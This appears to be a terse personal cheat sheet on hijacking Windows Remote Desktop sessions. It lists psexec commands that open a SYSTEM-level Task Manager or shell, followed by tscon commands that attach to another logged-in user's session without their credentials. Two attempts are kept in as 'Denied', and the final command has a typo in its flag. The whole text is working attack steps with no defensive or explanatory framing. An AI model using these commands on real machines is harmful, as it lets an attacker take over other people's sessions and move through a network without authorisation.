Session Hijacking:
Have to be Local Admin:
cmd
psexec -s \\localhost -i 2 taskmgr

Right Click > Connect
cmd
query user
tscon 1 — Denied
tscon 1 /dest:console — Denied
psexec -s \\localhost cmd
whoami
query user
tscon 1 /des:console